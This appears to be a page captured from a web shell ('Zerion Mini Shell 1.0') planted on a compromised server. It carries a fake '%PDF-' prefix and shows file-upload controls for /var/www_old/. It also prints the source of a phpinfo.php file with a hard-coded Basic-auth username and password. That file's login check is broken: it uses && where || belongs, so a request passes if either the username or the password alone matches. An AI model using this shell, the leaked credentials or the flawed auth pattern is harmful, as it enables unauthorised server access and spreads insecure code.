%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www_old/
Upload File :
Create Path :
Current File : //var/www_old/phpinfo.php__b81eaf3

<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) 
{
    header('WWW-Authenticate: Basic realm="mrazitko PHPINFO"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'UNAUTHORIZED!!!';
    exit;
} 
else 
{ 
    if($_SERVER['PHP_AUTH_USER'] != "waritko" && $_SERVER['PHP_AUTH_PW'] != "Pojka8uj")
    {
          header('WWW-Authenticate: Basic realm="mrazitko PHPINFO"');
          header('HTTP/1.0 401 Unauthorized');
          echo 'UNAUTHORIZED!!!';
          exit;
    }
}
phpinfo();
?>

Zerion Mini Shell 1.0